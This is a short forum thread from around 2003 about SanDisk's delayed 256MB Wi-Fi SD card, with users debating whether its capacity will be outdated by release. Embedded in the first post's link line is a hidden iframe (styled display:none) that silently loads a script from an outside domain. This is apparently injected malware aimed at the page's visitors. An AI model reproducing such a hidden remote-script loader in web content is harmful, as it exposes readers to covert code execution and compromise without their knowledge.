+ Reply to Thread

New 256MB & Wi-Fi SD Card

Sandisk announced one of the most anticipated products of this year: an SD card that will combine Wi-Fi and 256 MB of memory in one. When it was announced SanDisk said it would be available by mid-year. The company said on 3/25/2003 that it won't be available until September. It will sell for $150.

Click here for link<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    RayB

Yeah, this was actually announced late last year. SanDisk has pushed back the release schedule to late 3rd quarter of this year.

AJR
    By the time they release it, 512MB will be the norm for SD cards so it will allready be out of date!

Registered User All-Purpose Guru's Avatar
    Originally posted by AJR
    By the time they release it, 512MB will be the norm for SD cards so it will allready be out of date!
    I dunno. Haven't seen many SD cards that can connect to WiFi. I think I'd be willing to accept 256Mb if it also gave me WiFi.
    --apg

"Invention, my dear friends, is ninety-three percent perspiration, six percent electricity, four percent evaporation, and two percent butterscotch ripple." --W. Wonka